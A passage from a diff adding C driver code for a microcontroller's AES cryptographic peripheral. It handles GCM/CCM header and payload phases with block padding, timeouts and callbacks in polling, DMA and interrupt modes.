Disable computation complete flag and errors interrupts */ + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_CCFIE | CRYP_IT_ERRIE); + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + + /* Call output transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered Output complete callback*/ + hcryp->OutCpltCallback(hcryp); +#else + /*Call legacy weak Output complete callback*/ + HAL_CRYP_OutCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + + else if (((hcryp->Size / 4U) - (hcryp->CrypInCount)) >= 4U) + { + /* Write the input block in the IN FIFO */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + if ((hcryp->CrypInCount == (hcryp->Size / 4U)) && ((hcryp->Size % 16U) == 0U)) + { + /* Call Input transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered Input complete callback*/ + hcryp->InCpltCallback(hcryp); +#else + /*Call legacy weak Input complete callback*/ + HAL_CRYP_InCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + } + else /* Last block of payload < 128bit*/ + { + /* Workaround not implemented, Size should be %4 otherwise Tag will be incorrectly + generated for GCM Encryption & CCM Decryption. Workaround is implemented in polling mode, so if last block of + payload <128bit don't use CRYP_Encrypt_IT otherwise TAG is incorrectly generated for GCM Encryption & CCM Decryption. */ + + /* Compute the number of padding bytes in last block of payload */ + npblb = ((((uint32_t)(hcryp->Size) / 16U) + 1U) * 16U) - (uint32_t)(hcryp->Size); + + /* Number of valid words (lastwordsize) in last block */ + if ((npblb % 4U) == 0U) + { + lastwordsize = (16U - npblb) / 4U; + } + else + { + lastwordsize = ((16U - npblb) / 4U) + 1U; + } + + /* Last block optionally pad the data with zeros*/ + for (loopcounter = 0U; loopcounter < lastwordsize; loopcounter++) + { + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + } + while (loopcounter < 4U) + { + /* pad the data with zeros to have a complete block */ + hcryp->Instance->DINR = 0x0U; + loopcounter++; + } + } +#endif /* AES */ + +} + + +/** + * @brief Sets the header phase in polling mode + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module(Header & HeaderSize) + * @param Timeout: Timeout value + * @retval state + */ +static HAL_StatusTypeDef CRYP_GCMCCM_SetHeaderPhase(CRYP_HandleTypeDef *hcryp, uint32_t Timeout) +{ + uint32_t loopcounter; + uint32_t size_in_bytes; + uint32_t tmp; + uint32_t mask[12] = {0x0U, 0xFF000000U, 0xFFFF0000U, 0xFFFFFF00U, /* 32-bit data type */ + 0x0U, 0x0000FF00U, 0x0000FFFFU, 0xFF00FFFFU, /* 16-bit data type */ + 0x0U, 0x000000FFU, 0x0000FFFFU, 0x00FFFFFFU}; /* 8-bit data type */ + + /***************************** Header phase for GCM/GMAC or CCM *********************************/ + + if (hcryp->Init.HeaderWidthUnit == CRYP_HEADERWIDTHUNIT_WORD) + { + size_in_bytes = hcryp->Init.HeaderSize * 4U; + } + else + { + size_in_bytes = hcryp->Init.HeaderSize; + } + + if (size_in_bytes != 0U) + { + +#if defined(CRYP) + + /* Select header phase */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_HEADER); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + if ((size_in_bytes % 16U) == 0U) + { + /* HeaderSize %4, no padding */ + for (loopcounter = 0U; (loopcounter < (size_in_bytes / 4U)); loopcounter += 4U) + { + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + + /* Wait for IFEM to be raised */ + if (CRYP_WaitOnIFEMFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } + } + else + { + /*Write header block in the IN FIFO without last block */ + for (loopcounter = 0U; (loopcounter < ((size_in_bytes / 16U) * 4U)); loopcounter += 4U) + { + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + + /* Wait for IFEM to be raised */ + if (CRYP_WaitOnIFEMFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } + /* Last block optionally pad the data with zeros*/ + for (loopcounter = 0U; (loopcounter < ((size_in_bytes / 4U) % 4U)); loopcounter++) + { + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + } + /* If the header size is a multiple of words */ + if ((size_in_bytes % 4U) == 0U) + { + /* Pad the data with zeros to have a complete block */ + while (loopcounter < 4U) + { + hcryp->Instance->DIN = 0x0U; + loopcounter++; + } + } + else + { + /* Enter last bytes, padded with zeroes */ + tmp = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + tmp &= mask[(hcryp->Init.DataType * 2U) + (size_in_bytes % 4U)]; + hcryp->Instance->DIN = tmp; + loopcounter++; + /* Pad the data with zeros to have a complete block */ + while (loopcounter < 4U) + { + hcryp->Instance->DIN = 0x0U; + loopcounter++; + } + } + /* Wait for CCF IFEM to be raised */ + if (CRYP_WaitOnIFEMFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } + /* Wait until the complete message has been processed */ + if (CRYP_WaitOnBUSYFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked & return error */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + +#else /* AES */ + + if (hcryp->Init.Algorithm == CRYP_AES_GCM_GMAC) + { + /* Workaround 1 :only AES before re-enabling the IP, datatype can be configured.*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_DATATYPE, hcryp->Init.DataType); + + /* Select header phase */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_HEADER); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + } + /* If size_in_bytes is a multiple of blocks (a multiple of four 32-bits words ) */ + if ((size_in_bytes % 16U) == 0U) + { + /* No padding */ + for (loopcounter = 0U; (loopcounter < (size_in_bytes / 4U)); loopcounter += 4U) + { + /* Write the input block in the data input register */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + + if (CRYP_WaitOnCCFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + } + } + else + { + /*Write header block in the IN FIFO without last block */ + for (loopcounter = 0U; (loopcounter < ((size_in_bytes / 16U) * 4U)); loopcounter += 4U) + { + /* Write the input block in the data input register */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + + if (CRYP_WaitOnCCFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + } + /* Write last complete words */ + for (loopcounter = 0U; (loopcounter < ((size_in_bytes / 4U) % 4U)); loopcounter++) + { + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + } + /* If the header size is a multiple of words */ + if ((size_in_bytes % 4U) == 0U) + { + /* Pad the data with zeros to have a complete block */ + while (loopcounter < 4U) + { + hcryp->Instance->DINR = 0x0U; + loopcounter++; + } + } + else + { + /* Enter last bytes, padded with zeroes */ + tmp = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + tmp &= mask[(hcryp->Init.DataType * 2U) + (size_in_bytes % 4U)]; + hcryp->Instance->DINR = tmp; + loopcounter++; + /* Pad the data with zeros to have a complete block */ + while (loopcounter < 4U) + { + hcryp->Instance->DINR = 0x0U; + loopcounter++; + } + } + + if (CRYP_WaitOnCCFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + } +#endif /* End AES or CRYP */ + } + else + { +#if defined(AES) + if (hcryp->Init.Algorithm == CRYP_AES_GCM_GMAC) + { + /*Workaround 1: only AES, before re-enabling the IP, datatype can be configured.*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_DATATYPE, hcryp->Init.DataType); + + /* Select header phase */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_HEADER); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + } +#endif /* AES */ + } + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Sets the header phase when using DMA in process + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module(Header & HeaderSize) + * @retval None + */ +static HAL_StatusTypeDef CRYP_GCMCCM_SetHeaderPhase_DMA(CRYP_HandleTypeDef *hcryp) +{ + __IO uint32_t count = 0U; + uint32_t loopcounter; + uint32_t headersize_in_bytes; + uint32_t tmp; + uint32_t mask[12] = {0x0U, 0xFF000000U, 0xFFFF0000U, 0xFFFFFF00U, /* 32-bit data type */ + 0x0U, 0x0000FF00U, 0x0000FFFFU, 0xFF00FFFFU, /* 16-bit data type */ + 0x0U, 0x000000FFU, 0x0000FFFFU, 0x00FFFFFFU}; /* 8-bit data type */ + + /***************************** Header phase for GCM/GMAC or CCM *********************************/ + if (hcryp->Init.HeaderWidthUnit == CRYP_HEADERWIDTHUNIT_WORD) + { + headersize_in_bytes = hcryp->Init.HeaderSize * 4U; + } + else + { + headersize_in_bytes = hcryp->Init.HeaderSize; + } + + if (headersize_in_bytes != 0U) + { + +#if defined(CRYP) + + /* Select header phase */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_HEADER); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + if ((headersize_in_bytes % 16U) == 0U) + { + /* HeaderSize %4, no padding */ + for (loopcounter = 0U; (loopcounter < (headersize_in_bytes / 4U)); loopcounter += 4U) + { + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + + /* Wait for IFEM to be raised */ + count = CRYP_TIMEOUT_GCMCCMHEADERPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, CRYP_FLAG_IFEM)); + } + } + else + { + /*Write header block in the IN FIFO without last block */ + for (loopcounter = 0U; (loopcounter < ((headersize_in_bytes / 16U) * 4U)); loopcounter += 4U) + { + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + + /* Wait for IFEM to be raised */ + count = CRYP_TIMEOUT_GCMCCMHEADERPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, CRYP_FLAG_IFEM)); + } + /* Last block optionally pad the data with zeros*/ + for (loopcounter = 0U; (loopcounter < ((headersize_in_bytes / 4U) % 4U)); loopcounter++) + { + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + } + /* If the header size is a multiple of words */ + if ((headersize_in_bytes % 4U) == 0U) + { + /* Pad the data with zeros to have a complete block */ + while (loopcounter < 4U) + { + hcryp->Instance->DIN = 0x0U; + loopcounter++; + } + } + else + { + /* Enter last bytes, padded with zeroes */ + tmp = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + tmp &= mask[(hcryp->Init.DataType * 2U) + (headersize_in_bytes % 4U)]; + hcryp->Instance->DIN = tmp; + loopcounter++; + /* Pad the data with zeros to have a complete block */ + while (loopcounter < 4U) + { + hcryp->Instance->DIN = 0x0U; + loopcounter++; + } + } + /* Wait for IFEM to be raised */ + count = CRYP_TIMEOUT_GCMCCMHEADERPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, CRYP_FLAG_IFEM)); + } + /* Wait until the complete message has been processed */ + count = CRYP_TIMEOUT_GCMCCMHEADERPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_SET(hcryp->Instance->SR, CRYP_FLAG_BUSY)); + +#else /* AES */ + + if (hcryp->Init.Algorithm == CRYP_AES_GCM_GMAC) + { + /* Workaround 1: only AES, before re-enabling the IP, datatype can be configured.*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_DATATYPE, hcryp->Init.DataType); + + /* Select header phase */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_HEADER); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + } + if ((headersize_in_bytes % 16U) == 0U) + { + /* HeaderSize %4, no padding */ + for (loopcounter = 0U; (loopcounter < (headersize_in_bytes / 4U)); loopcounter += 4U) + { + /* Write the input block in the data input register */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + + /*Wait on CCF flag*/ + count = CRYP_TIMEOUT_GCMCCMHEADERPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)); + + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + } + } + else + { + /*Write header block in the IN FIFO without last block */ + for (loopcounter = 0U; (loopcounter < ((headersize_in_bytes / 16U) * 4U)); loopcounter += 4U) + { + /* Write the Input block in the Data Input register */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + + /*Wait on CCF flag*/ + count = CRYP_TIMEOUT_GCMCCMHEADERPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)); + + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + } + /* Last block optionally pad the data with zeros*/ + for (loopcounter = 0U; (loopcounter < ((headersize_in_bytes /4U) % 4U)); loopcounter++) + { + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + } + /* If the header size is a multiple of words */ + if ((headersize_in_bytes % 4U) == 0U) + { + /* Pad the data with zeros to have a complete block */ + while (loopcounter < 4U) + { + hcryp->Instance->DINR = 0x0U; + loopcounter++; + } + } + else + { + /* Enter last bytes, padded with zeroes */ + tmp = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + tmp &= mask[(hcryp->Init.DataType * 2U) + (headersize_in_bytes % 4U)]; + hcryp->Instance->DINR = tmp; + loopcounter++; + /* Pad the data with zeros to have a complete block */ + while (loopcounter < 4U) + { + hcryp->Instance->DINR = 0x0U; + loopcounter++; + } + } + /*Wait on CCF flag*/ + count = CRYP_TIMEOUT_GCMCCMHEADERPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)); + + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + } +#endif /* End AES or CRYP */ + } + else + { +#if defined(AES) + if (hcryp->Init.Algorithm == CRYP_AES_GCM_GMAC) + { + /*Workaround 1: only AES, before re-enabling the IP, datatype can be configured.*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_DATATYPE, hcryp->Init.DataType); + + /* Select header phase */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_HEADER); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + } +#endif /* AES */ + } + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Sets the header phase in interrupt mode + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module(Header & HeaderSize) + * @retval None + */ +static void CRYP_GCMCCM_SetHeaderPhase_IT(CRYP_HandleTypeDef *hcryp) +{ + uint32_t loopcounter; +#if defined(AES) + uint32_t lastwordsize; + uint32_t npblb; +#endif + uint32_t headersize_in_bytes; + uint32_t tmp; + uint32_t mask[12] = {0x0U, 0xFF000000U, 0xFFFF0000U, 0xFFFFFF00U, /* 32-bit data type */ + 0x0U, 0x0000FF00U, 0x0000FFFFU, 0xFF00FFFFU, /* 16-bit data type */ + 0x0U, 0x000000FFU, 0x0000FFFFU, 0x00FFFFFFU}; /* 8-bit data type */ + + if (hcryp->Init.HeaderWidthUnit == CRYP_HEADERWIDTHUNIT_WORD) + { + headersize_in_bytes = hcryp->Init.HeaderSize * 4U; + } + else + { + headersize_in_bytes = hcryp->Init.HeaderSize; + } + + /***************************** Header phase *********************************/ + +#if defined(CRYP) + if (headersize_in_bytes <= ((uint32_t)(hcryp->CrypHeaderCount) * 4U)) + { + /* Disable interrupts */ + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_INI); + + /* Disable the CRYP peripheral */ + __HAL_CRYP_DISABLE(hcryp); + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Select payload phase once the header phase is performed */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_PAYLOAD); + + /* Enable Interrupts */ + __HAL_CRYP_ENABLE_IT(hcryp, CRYP_IT_INI | CRYP_IT_OUTI); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + } + else if (((headersize_in_bytes / 4U) - (hcryp->CrypHeaderCount)) >= 4U) + + { + /* HeaderSize %4, no padding */ + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + } + else + { + /* Last block optionally pad the data with zeros*/ + for (loopcounter = 0U; loopcounter < ((headersize_in_bytes / 4U) % 4U); loopcounter++) + { + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + } + if ((headersize_in_bytes % 4U) == 0U) + { + /* Pad the data with zeros to have a complete block */ + while (loopcounter < 4U) + { + hcryp->Instance->DIN = 0x0U; + loopcounter++; + hcryp->CrypHeaderCount++; + } + } + else + { + /* Enter last bytes, padded with zeros */ + tmp = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + tmp &= mask[(hcryp->Init.DataType * 2U) + (headersize_in_bytes % 4U)]; + hcryp->Instance->DIN = tmp; + loopcounter++; + hcryp->CrypHeaderCount++; + /* Pad the data with zeros to have a complete block */ + while (loopcounter < 4U) + { + hcryp->Instance->DIN = 0x0U; + loopcounter++; + hcryp->CrypHeaderCount++; + } + } + } +#else /* AES */ + + if (headersize_in_bytes <= ((uint32_t)(hcryp->CrypHeaderCount) * 4U)) + { + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Payload phase not supported in CCM AES2 */ + if (hcryp->Init.Algorithm == CRYP_AES_GCM_GMAC) + { + /* Select payload phase once the header phase is performed */ + MODIFY_REG(hcryp->Instance->CR, AES_CR_GCMPH, CRYP_PHASE_PAYLOAD); + } + if (hcryp->Init.Algorithm == CRYP_AES_CCM) + { + /* Increment CrypHeaderCount to pass in CRYP_GCMCCM_SetPayloadPhase_IT */ + hcryp->CrypHeaderCount++; + } + /* Write the payload Input block in the IN FIFO */ + if (hcryp->Size == 0U) + { + /* Disable interrupts */ + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_CCFIE | CRYP_IT_ERRIE); + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + } + else if (hcryp->Size >= 16U) + { + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + + if ((hcryp->CrypInCount == (hcryp->Size / 4U)) && ((hcryp->Size % 16U) == 0U)) + { + /* Call the input data transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered Input complete callback*/ + hcryp->InCpltCallback(hcryp); +#else + /*Call legacy weak Input complete callback*/ + HAL_CRYP_InCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + } + else /* Size < 4 words : first block is the last block*/ + { + /* Workaround not implemented, Size should be %4 otherwise Tag will be incorrectly + generated for GCM Encryption. Workaround is implemented in polling mode, so if last block of + payload <128bit don't use CRYP_Encrypt_IT otherwise TAG is incorrectly generated for GCM Encryption. */ + + /* Compute the number of padding bytes in last block of payload */ + npblb = ((((uint32_t)(hcryp->Size) / 16U) + 1U) * 16U) - (uint32_t)(hcryp->Size); + + /* Number of valid words (lastwordsize) in last block */ + if ((npblb % 4U) == 0U) + { + lastwordsize = (16U - npblb) / 4U; + } + else + { + lastwordsize = ((16U - npblb) / 4U) + 1U; + } + + /* Last 